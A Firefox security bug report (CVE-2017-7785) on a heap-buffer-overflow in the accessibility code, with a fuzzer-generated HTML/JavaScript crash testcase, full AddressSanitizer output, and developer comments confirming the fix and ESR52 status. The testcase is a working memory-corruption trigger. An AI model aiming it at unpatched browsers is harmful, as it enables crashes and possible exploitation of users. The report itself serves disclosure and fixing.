1356985 - (CVE-2017-7785) heap-buffer-overflow in mozilla::a11y::DocAccessible::PutChildrenBack

Status: VERIFIED FIXED

(Core :: Disability Access APIs, defect)

Description

[Nils]

The following testcase crashes the latest ASAN build of Firefox.

crash.html:
<script>
function start() {
	try{fuzzPriv.enableAccessibility();}catch(e){ };
	o5=document;
	o105=document.documentElement;
	document.documentElement.innerHTML="<figcaption id='id16'><style' id='id29'>";
	o252=document.createElement('audio');
	o253=document.createElement('track');
	o252.appendChild(o253);
	o5.write('<html><body><div>');
	o256=o5.all[2];
	o252.controls^=1;
	o5.documentElement.appendChild(o252);
	o5.defaultView.onerror=fun1;
	setTimeout(fun0, 4);
}
function fun0() {
	document.documentElement.style.transform='scale(0.1)';
	o348=document.createElement('style');
	o349=document.createTextNode("@import url('data:text/css,.class0{display:inline;mask-repeat:round;}')");
	o348.appendChild(o349);
	o350=document.createElement('iframe');
	try{document.documentElement.animate([{background: '-moz-element(#id4)',},{}],100);}catch(e){}
	document.documentElement.appendChild(o105);
	document.documentElement.appendChild(o350);
	document.documentElement.appendChild(o348);
	o256.classList.toggle('class0');
}
var c=0;
function fun1() {
	if(c++!=1) return;
	o314=document.createElement("form");
	document.documentElement.appendChild(o314);
	o256.id='id14';
	o350.setAttribute('aria-owns','id29 id36 id4 id4');
	o314.setAttribute('aria-owns','id52 id14 id39 id47 id54 id16 id16 id29');
}
</script>
<body onload="start()"></body>


ASAN output:
=================================================================
==6299==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001ebe28 at pc 0x7f663ff03f2a bp 0x7ffe5e40bc50 sp 0x7ffe5e40bc48
READ of size 8 at 0x6020001ebe28 thread T0 (Web Content)
    #0 0x7f663ff03f29 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9
    #1 0x7f663ff03f29 in Destruct /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:560
    #2 0x7f663ff03f29 in DestructRange /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2007
    #3 0x7f663ff03f29 in RemoveElementsAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2055
    #4 0x7f663ff03f29 in mozilla::a11y::DocAccessible::PutChildrenBack(nsTArray<RefPtr<mozilla::a11y::Accessible> >*, unsigned int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2204
    #5 0x7f663ff0492d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2153:3
    #6 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #7 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #8 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #9 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #10 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #11 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #12 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #13 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #14 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #15 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #16 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #17 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #18 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #19 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #20 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #21 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #22 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #23 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #24 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #25 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #26 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #27 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #28 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #29 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #30 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #31 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #32 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #33 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #34 0x7f665290382f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #35 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)

0x6020001ebe28 is located 8 bytes to the left of 16-byte region [0x6020001ebe30,0x6020001ebe40)
allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f663703f450 in Alloc /home/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:242:22
    #2 0x7f663703f450 in nsAString::MutatePrep(unsigned int, char16_t**, unsigned int*) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:155
    #3 0x7f6637046fb5 in nsAString::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:217:8
    #4 0x7f6637046e05 in nsAString::ReplacePrep(unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:207:10
    #5 0x7f663704977e in nsAString::Replace(unsigned int, unsigned int, char16_t) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:534:7
    #6 0x7f663fe6007d in mozilla::a11y::NotificationController::QueueMutationEvent(mozilla::a11y::AccTreeMutationEvent*) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:205:28
    #7 0x7f663fee54ef in mozilla::a11y::Accessible::MoveChild(unsigned int, mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/Accessible.cpp:2208:47
    #8 0x7f663ff05494 in mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*, int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2232:16
    #9 0x7f663ff0479d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2144:9
    #10 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #11 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #12 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #13 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #14 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #15 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #16 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #17 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #18 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #19 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #20 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #21 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #22 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #23 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #24 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #25 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #26 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #27 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #28 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #31 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #32 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #33 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #34 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #35 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9 in ~RefPtr
Shadow bytes around the buggy address:
  0x0c0480035770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c04800357c0: fa fa 00 00 fa[fa]00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357e0: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
  0x0c04800357f0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035800: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035810: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==6299==ABORTING

Comment 1

[Stephanie Ouillon [:arroway] (needinfo me)]

Alex, can you look into this bug?

Comment 2

[alexander :surkov (:asurkov)]

it is not against trunk, isn't it? it appears patch from bug 1362063 (which tweaked this code a bit) is not on stack here

Comment 3

[Frederik Braun [:freddy]]

Nils, it appears that this bug does not reproduce cleanly on the latest Firefox Nightly. Alexander suggested this was fixed independently in bug 1362063. Can you retest to confirm there is no other way to trigger this?

Comment 4

[Nils]

It was against trunk when it was reported two month ago. I can confirm that it does not reproduce against the latest build.

Comment 5

[Frederik Braun [:freddy]]

Thank you for closing the loop, Nils.
I will close this bug as it was fixed unknowingly in bug 1362063.
We'll leaving the bounty decision to the committee later.

Comment 6

[Daniel Veditz [:dveditz]]

Since the other bug is not a vulnerability, we get better tracking and testing if we make security bugs like this "Depend on" the generic bug (rewrite or whatever) and call this "FIXED" so we trigger our "does this need to land on branches" queries.

Comment 7

[Ryan VanderMeulen [:RyanVM][PTO June 24-28]]

Indeed, is ESR52 affected?

Comment 8

[alexander :surkov (:asurkov)]

(In reply to Ryan VanderMeulen [:RyanVM] from comment #7)
> Indeed, is ESR52 affected?

It is a good question. Could someone to confirm there's a problem on branches, and if so, then I will make a backport.

Comment 9

[Al Billings [:abillings - ex-MoCo]]

Nils, do you know if this affects Firefox 52 (or ESR 52)?

Comment 10

[Nils]

Al, I can't reproduce the crash on ESR 52 and I have not seen any similar crashes on ESR while fuzzing.

Comment 11

[Emil Ghitta, QA [:emilghitta]]

I have managed to reproduce this issue by following the testcase provided in comment 0 using Firefox 55.0a1 asan build (Build Id: 20170417195632) using Ubuntu 16.04 64bit.

This issue is no longer reproducible on Firefox 55.0 asan build (Build Id:20170731163142).